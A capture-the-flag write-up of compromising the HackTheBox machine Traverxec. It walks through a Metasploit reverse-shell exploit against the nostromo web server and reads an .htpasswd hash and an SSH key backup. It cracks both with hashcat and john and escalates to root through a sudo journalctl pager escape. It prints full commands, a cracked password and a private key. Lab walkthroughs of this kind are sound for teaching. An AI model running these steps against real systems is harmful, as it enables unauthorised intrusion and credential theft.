Welcome to my write up of how I hacked the Traverxec box on HackTheBox! Lets jump right on and start with an nmap scan:

nmap -T4 -A -v 10.10.10.165

And this is the interesting result:

[...]
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.18 (90%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).
[...]

OK, only two ports and there's one portal. My approach brings me immediately to the portal: http://10.10.10.165/

After I navigate around and analyze the portal find nothing interesting. To generate more information, I use tools like OWASP ZAP and wfuzz to identify possible vulnerabilities or point of access to the portal (including the form on the bottom of the page), but nothing emerged. Anyway, there's another interesting information on the nmap result, that gives us information about the name of the used web server and its version: nostromo 1.9.6.

I search on exploit-db and immediate there's reverse shell exploitation on that. It should be also on metasploit framework, so I launch my msfconsole and try to proceed. The only parameter that I have to set is the rhost with the IP address of the target and the lhost value with my IP address.

msf5 > search nostromo

Matching Modules
================

   #  Name                                   Disclosure Date  Rank  Check  Description
   -  ----                                   ---------------  ----  -----  -----------
   0  exploit/multi/http/nostromo_code_exec  2019-10-20       good  Yes    Nostromo Directory Traversal Remote Command Execution


msf5 > use exploit/multi/http/nostromo_code_exec
msf5 exploit(multi/http/nostromo_code_exec) > set rhosts 10.10.10.165
rhosts => 10.10.10.165
msf5 exploit(multi/http/nostromo_code_exec) > set lhost 10.10.15.124
lhost => 10.10.15.124
msf5 exploit(multi/http/nostromo_code_exec) > options

Module options (exploit/multi/http/nostromo_code_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   10.10.10.165     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.15.124     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)

msf5 exploit(multi/http/nostromo_code_exec) > exploit

[*] Started reverse TCP handler on 10.10.15.124:4444 
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 3 opened (10.10.15.124:4444 -> 10.10.10.165:50700) at 2020-03-07 18:00:31 +0100

As usual, I report only the interesting phases of my attack, but this time, I would describe an interesting "Rabbit Hole", that finally, will be not useful to complete the CTF challenge, but it's interesting and my opinion could be an interesting argument that can give to all of us (or leas something ones) additional know-how.

Found on the /var folder the nostromo directory with the configuration file.

ls -l /var
total 40
drwxr-xr-x  2 root root  4096 Nov 12 06:25 backups
drwxr-xr-x  9 root root  4096 Oct 25 14:34 cache
drwxr-xr-x 26 root root  4096 Nov 12 04:56 lib
drwxrwsr-x  2 root staff 4096 May 13  2019 local
lrwxrwxrwx  1 root root     9 Oct 25 14:15 lock -> /run/lock
drwxr-xr-x  5 root root  4096 Mar  7 07:59 log
drwxrwsr-x  2 root mail  4096 Oct 25 14:15 mail
drwxr-xr-x  6 root root  4096 Oct 25 14:43 nostromo
drwxr-xr-x  2 root root  4096 Oct 25 14:15 opt
lrwxrwxrwx  1 root root     4 Oct 25 14:15 run -> /run
drwxr-xr-x  4 root root  4096 Oct 25 14:16 spool
drwxrwxrwt  3 root root  4096 Mar  7 08:43 tmp
ls -l /var/nostromo
total 16
drwxr-xr-x 2 root     daemon 4096 Oct 27 16:12 conf
drwxr-xr-x 6 root     daemon 4096 Oct 25 17:11 htdocs
drwxr-xr-x 2 root     daemon 4096 Oct 25 14:43 icons
drwxr-xr-x 2 www-data daemon 4096 Mar  7 07:59 logs
ls -l /var/nostromo/conf
total 8
-rw-r--r-- 1 root bin 2928 Oct 25 14:26 mimes
-rw-r--r-- 1 root bin  498 Oct 25 15:20 nhttpd.conf
cat /var/nostromo/conf/nhttpd.conf
# MAIN [MANDATORY]

servername              traverxec.htb
serverlisten            *
serveradmin             david@traverxec.htb
serverroot              /var/nostromo
servermimes             conf/mimes
docroot                 /var/nostromo/htdocs
docindex                index.html

# LOGS [OPTIONAL]

logpid                  logs/nhttpd.pid

# SETUID [RECOMMENDED]

user                    www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess                .htaccess
htpasswd                /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons                  /var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs                /home
homedirs_public         public_www

cat /var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

At the bottom of the file there's interesting information, it seems to be the david's credential but is encrypted and we have to recover to the original password.

So I decide to use a hash analyzer; report here the link: https://www.tunnelsup.com/hash-analyzer/.

As you can see, it is a simple (so to speak) an MD5 crypt algorithm with salt (salt and hash are visible on the entire key divided by the "$" char and there's another interesting information on the beginning of the key "$1$"). I tried with john the ripper tool, but probably I have mistaken some parameter and I can't find the result. Anyway, back on the page of the analyzer, I found some interesting link. I discovered another tool called hashcat, used to decrypt hashing data. To understand better how to use it, I followed this page:

https://hashcat.net/wiki/doku.php?id=example_hashes

Here there's a list of all the hashing type known until now (well, there are many), what I did, was to search for my specific hashing type, so I can know the parameter to use the correct algorithm. Searching "$1$" string I found only one occurrence:

500  md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5) 2  $1$28772684$iEwNOgGugqO9.bIz5sk8k/

So, I launch the command and cross my finger.

in7rud3r@kali:/root/Desktop/hackthebox/_Traverxec - 10.10.10.165/attack$ hashcat -m 500 --force hash.txt /usr/share/wordlists/rockyou.txt     
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM)2 Duo CPU     T8300  @ 2.40GHz, 1024/2900 MB allocatable, 2MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=500 -D _unroll'
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s

$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/:Nowonly4me    
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)
Hash.Target......: $1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
Time.Started.....: Sat Mar  7 16:33:12 2020 (51 mins, 3 secs)
Time.Estimated...: Sat Mar  7 17:24:15 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     3549 H/s (8.83ms) @ Accel:128 Loops:125 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10776576/14344385 (75.13%)
Rejected.........: 0/10776576 (0.00%)
Restore.Point....: 10776320/14344385 (75.13%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:875-1000
Candidates.#1....: Nowonly4me -> Nov25th

Started: Sat Mar  7 16:33:08 2020
Stopped: Sat Mar  7 17:24:17 2020

Ok, as you can see, on my slow PC, the whole process lasted about fifty minutes.

We have a password now, but, let me say that I'll never use this information during the entire challenge (or better, I tried, but it has never been useful).

For example, I try to access through the ssh with the david user...

in7rud3r@kali:/root/Desktop/hackthebox/_Traverxec - 10.10.10.165$ ssh david@10.10.10.165
david@10.10.10.165's password: 
Permission denied, please try again.

...but (as you can see) I can't.

I thought that probably I could be used it on the portal, so I back on the wfuzz tool, to search again some hidden path on the site.

in7rud3r@kali:/root/Desktop/hackthebox/_Traverxec - 10.10.10.165$ wfuzz -t 1 -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc=404 http://10.10.10.165/FUZZ/

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.165/FUZZ/
Total requests: 949

===================================================================
ID           Response   Lines    Word     Chars       Payload         ===================================================================

000000223:   200        17 L     46 W     602 Ch      "css"
000000409:   200        18 L     55 W     736 Ch      "icons"
000000413:   200        30 L     163 W    2625 Ch     "img"
000000454:   200        17 L     46 W     596 Ch      "js" 
000000469:   200        23 L     100 W    1487 Ch     "lib"                                       

Total time: 161.0141
Processed Requests: 949
Filtered Requests: 944
Requests/sec.: 5.893893

I used different wordlist files, but nothing found, so, I come back on the only way I found, the shell on the nostromo service web. Navigate again through the folder of the machine and finally, I found something. I read again the configuration file of nostromo where I found the encrypted password before and I see this information:

[...]
# HOMEDIRS [OPTIONAL]

homedirs                /home
homedirs_public         public_www
[...]

I try to search on the home the public_www folder, but it not appear, the only folder on the home directory was the david's folder and it's empty. So, with a small fantasy, I try to do something.

ls -l /home/david/public_www/
total 8
-rw-r--r-- 1 david david  402 Oct 25 15:45 index.html
drwxr-xr-x 2 david david 4096 Oct 25 17:02 protected-file-area
ls -l /home/david/public_www/protected-file-area
total 4
-rw-r--r-- 1 david david 1915 Oct 25 17:02 backup-ssh-identity-files.tgz

OK, a nice surprise. Give a look in the compressed file.

tar -tvf /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz
drwx------ david/david       0 2019-10-25 17:02 home/david/.ssh/
-rw-r--r-- david/david     397 2019-10-25 17:02 home/david/.ssh/authorized_keys
-rw------- david/david    1766 2019-10-25 17:02 home/david/.ssh/id_rsa
-rw-r--r-- david/david     397 2019-10-25 17:02 home/david/.ssh/id_rsa.pub

Uhuh... if whats inside is what I think, probably I should be near the first flag, so lets extract it and go deeper.

mkdir /tmp/mydatakkk
ls -l /tmp/mydatakkk
total 0
tar zxvf /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz -C /tmp/mydatakkk
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub
ls -l /tmp/mydatakkk/home/david/.ssh
total 12
-rw-r--r-- 1 www-data www-data  397 Oct 25 17:02 authorized_keys
-rw------- 1 www-data www-data 1766 Oct 25 17:02 id_rsa
-rw-r--r-- 1 www-data www-data  397 Oct 25 17:02 id_rsa.pub
cat /tmp/mydatakkk/home/david/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,477EEFFBA56F9D283D349033D5D08C4F

seyeH/feG19TlUaMdvHZK/2qfy8pwwdr9sg75x4hPpJJ8YauhWorCN4LPJV+wfCG
tuiBPfZy+ZPklLkOneIggoruLkVGW4k4651pwekZnjsT8IMM3jndLNSRkjxCTX3W
KzW9VFPujSQZnHM9Jho6J8O8LTzl+s6GjPpFxjo2Ar2nPwjofdQejPBeO7kXwDFU
RJUpcsAtpHAbXaJI9LFyX8IhQ8frTOOLuBMmuSEwhz9KVjw2kiLBLyKS+sUT9/V7
HHVHW47Y/EVFgrEXKu0OP8rFtYULQ+7k7nfb7fHIgKJ/6QYZe69r0AXEOtv44zIc
Y1OMGryQp5CVztcCHLyS/9GsRB0d0TtlqY2LXk+1nuYPyyZJhyngE7bP9jsp+hec
dTRqVqTnP7zI8GyKTV+KNgA0m7UWQNS+JgqvSQ9YDjZIwFlA8jxJP9HsuWWXT0ZN
6pmYZc/rNkCEl2l/oJbaJB3jP/1GWzo/q5JXA6jjyrd9xZDN5bX2E2gzdcCPd5qO
xwzna6js2kMdCxIRNVErnvSGBIBS0s/OnXpHnJTjMrkqgrPWCeLAf0xEPTgktqi1
Q2IMJqhW9LkUs48s+z72eAhl8naEfgn+fbQm5MMZ/x6BCuxSNWAFqnuj4RALjdn6
i27gesRkxxnSMZ5DmQXMrrIBuuLJ6gHgjruaCpdh5HuEHEfUFqnbJobJA3Nev54T
fzeAtR8rVJHlCuo5jmu6hitqGsjyHFJ/hSFYtbO5CmZR0hMWl1zVQ3CbNhjeIwFA
bzgSzzJdKYbGD9tyfK3z3RckVhgVDgEMFRB5HqC+yHDyRb+U5ka3LclgT1rO+2so
uDi6fXyvABX+e4E4lwJZoBtHk/NqMvDTeb9tdNOkVbTdFc2kWtz98VF9yoN82u8I
Ak/KOnp7lzHnR07dvdD61RzHkm37rvTYrUexaHJ458dHT36rfUxafe81v6l6RM8s
9CBrEp+LKAA2JrK5P20BrqFuPfWXvFtROLYepG9eHNFeN4uMsuT/55lbfn5S41/U
rGw0txYInVmeLR0RJO37b3/haSIrycak8LZzFSPUNuwqFcbxR8QJFqqLxhaMztua
4mOqrAeGFPP8DSgY3TCloRM0Hi/MzHPUIctxHV2RbYO/6TDHfz+Z26ntXPzuAgRU
/8Gzgw56EyHDaTgNtqYadXruYJ1iNDyArEAu+KvVZhYlYjhSLFfo2yRdOuGBm9AX
JPNeaxw0DX8UwGbAQyU0k49ePBFeEgQh9NEcYegCoHluaqpafxYx2c5MpY1nRg8+
XBzbLF9pcMxZiAWrs4bWUqAodXfEU6FZv7dsatTa9lwH04aj/5qxEbJuwuAuW5Lh
hORAZvbHuIxCzneqqRjS4tNRm0kF9uI5WkfK1eLMO3gXtVffO6vDD3mcTNL1pQuf
SP0GqvQ1diBixPMx+YkiimRggUwcGnd3lRBBQ2MNwWt59Rri3Z4Ai0pfb1K7TvOM
j1aQ4bQmVX8uBoqbPvW0/oQjkbCvfR4Xv6Q+cba/FnGNZxhHR8jcH80VaNS469tt
VeYniFU/TGnRKDYLQH2x0ni1tBf0wKOLERY0CbGDcquzRoWjAmTN/PV2VbEKKD/w
-----END RSA PRIVATE KEY-----
cat /tmp/mydatakkk/home/david/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsXrsMQc0U71GVXMQcTOYIH2ZvCwpxTxN1jOYbTutvNyYThEIjYpCVs5DKhZi2rNunI8Z+Ey/FC9bpmCiJtao0xxIbJ02c+H6q13aAFrTv61GAzi5neX4Lj2E/pIhd3JBFYRIQw97C66MO3UVqxKcnGrCvYnhJvKMw7nSRI/cXTPHAEnwU0+NW2zBKId8cRRLxGFyM49pjDZPsAVgGlfdBD380vVa9dMrJ/T13vDTZZGoDgcq9gRtD1B6NJoLHaRWH4ikRuQvLWjk3nWDDaRjw6MxmRtLk8h0MM7+IiBYc6NJvbQzpG5M5oM0FvhawQetN71KcZ4jUVxN3m+YkaqHD david@traverxec
cat /tmp/mydatakkk/home/david/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsXrsMQc0U71GVXMQcTOYIH2ZvCwpxTxN1jOYbTutvNyYThEIjYpCVs5DKhZi2rNunI8Z+Ey/FC9bpmCiJtao0xxIbJ02c+H6q13aAFrTv61GAzi5neX4Lj2E/pIhd3JBFYRIQw97C66MO3UVqxKcnGrCvYnhJvKMw7nSRI/cXTPHAEnwU0+NW2zBKId8cRRLxGFyM49pjDZPsAVgGlfdBD380vVa9dMrJ/T13vDTZZGoDgcq9gRtD1B6NJoLHaRWH4ikRuQvLWjk3nWDDaRjw6MxmRtLk8h0MM7+IiBYc6NJvbQzpG5M5oM0FvhawQetN71KcZ4jUVxN3m+YkaqHD david@traverxec

Yes, it's what I think. I create the private key on my local machine and this time, john the ripper is my best friends.

root@kali:~/Desktop/hackthebox/_Traverxec - 10.10.10.165/attack# python3 /usr/share/john/ssh2john.py id_rsa > id_rsa.hash
/usr/share/john/ssh2john.py:103: DeprecationWarning: decodestring() is a deprecated alias since Python 3.1, use decodebytes()
  data = base64.decodestring(data)

in7rud3r@kali:/root/Desktop/hackthebox/_Traverxec - 10.10.10.165/attack$ john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (id_rsa)
1g 0:00:00:11 DONE (2020-03-08 12:15) 0.08547g/s 1225Kp/s 1225Kc/s 1225KC/sa6_123..*7¡Vamos!
Session completed

Good, the next step is to connect through ssh to the target machine and again cross the finger.

in7rud3r@kali:/root/Desktop/hackthebox/_Traverxec - 10.10.10.165/attack$ ssh -i id_rsa david@10.10.10.165
Enter passphrase for key 'id_rsa': 
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Sun Mar  8 07:11:16 2020 from 10.10.15.205
david@traverxec:~$ pwd
/home/david
david@traverxec:~$ ls -l
total 60
drwx------ 3 david david  4096 Mar  8 07:12 bin
-rwxr-xr-x 1 david david 46631 Mar  1 14:36 linenum.sh
drwxr-xr-x 3 david david  4096 Oct 25 15:45 public_www
-r--r----- 1 root  david    33 Oct 25 16:14 user.txt
david@traverxec:~$ cat user.txt
7******************************d

And the first flag is taken.

Now, I have to confess that turn around for many hours before finding something and, let me say that I had to resort to help in a forum. On the david's folder, there's a directory by the name "bin". Inside there's a sh file with an interesting command.

david@traverxec:~/bin$ ls -la 
total 24
drwx------ 2 david david 4096 Mar  8 09:33 .
drwx--x--x 6 david david 4096 Mar  8 09:42 ..
-rw------- 1 david david 1460 Mar  8 09:33 nano.save
-rw------- 1 david david 1460 Mar  8 09:33 nano.save.1
-r-------- 1 david david  802 Oct 25 16:26 server-stats.head
-rwx------ 1 david david  363 Oct 25 16:26 server-stats.sh
david@traverxec:~/bin$ cat server-stats.sh 
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat 

The last line seems to be executed with superuser permissions. I try to launch it on the shell and I can, but, if I try to change some args, the system asks to me for the password (yes, I try with the one found before, but as I said, it doesn't work).

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Sun 2020-03-08 09:28:40 EDT, end at Sun 2020-03-08 10:29:23 EDT. --
Mar 08 10:26:47 traverxec sudo[1781]: www-data : command not allowed ; TTY=pts/6 ; PWD=/ ; USER=root ; COMMAND=list
Mar 08 10:26:58 traverxec sudo[1788]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/
Mar 08 10:27:08 traverxec sudo[1788]: www-data : command not allowed ; TTY=pts/5 ; PWD=/tmp ; USER=root ; COMMAND=list
Mar 08 10:27:15 traverxec su[1793]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty=pts/5 ruser=w
Mar 08 10:27:17 traverxec su[1793]: FAILED SU (to root) www-data on pts/5
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n6 -unostromo.service
[sudo] password for david: 
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl
[sudo] password for david: 
david@traverxec:~/bin$ 

The important tip that I read in the forum, was about the GTFOBins SUID, that I don't know. GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. Nice, so I understand that I can search here something I can use to exploit a permission's elevation and, fortunately, I found the journalctl command.

https://gtfobins.github.io/gtfobins/journalctl/

Ok, I think should be done; last steps and the second flag will be mine.

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Sun 2020-03-08 09:28:40 EDT, end at Sun 2020-03-08 10:36:07 EDT. --
Mar 08 10:30:37 traverxec su[1843]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty=pts/6 ruser=w
Mar 08 10:30:39 traverxec su[1843]: FAILED SU (to david) www-data on pts/6
Mar 08 10:35:17 traverxec sudo[2080]: pam_unix(sudo:auth): conversation failed
Mar 08 10:35:17 traverxec sudo[2080]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Mar 08 10:35:17 traverxec sudo[2080]: www-data : user NOT in sudoers ; TTY=pts/6 ; PWD=/ ; USER=root ; COMMAND=/usr/bin
!/bin/sh
# ls -l
total 16
-rw------- 1 david david 1460 Mar  8 09:33 nano.save
-rw------- 1 david david 1460 Mar  8 09:33 nano.save.1
-r-------- 1 david david  802 Oct 25 16:26 server-stats.head
-rwx------ 1 david david  363 Oct 25 16:26 server-stats.sh
# ls -la /root  
total 68
drwx------  3 root root  4096 Mar  8 09:46 .
drwxr-xr-x 18 root root  4096 Oct 25 14:17 ..
lrwxrwxrwx  1 root root     9 Oct 25 16:21 .bash_history -> /dev/null
-rw-r--r--  1 root root   570 Jan 31  2010 .bashrc
-rw-------  1 root root    47 Mar  8 09:46 .lesshst
drwxr-xr-x  3 root root  4096 Nov 12 04:00 .local
-rw-r--r--  1 root root 37520 Oct 25 14:43 nostromo_1.9.6-1.deb
-rw-r--r--  1 root root   148 Aug 17  2015 .profile
-r--------  1 root root    33 Oct 25 16:21 root.txt
# cat /root/root.txt
9********************6

That's all folks!

The awesome image used in this article is called Braaaaains and it was created by Graham Erwin.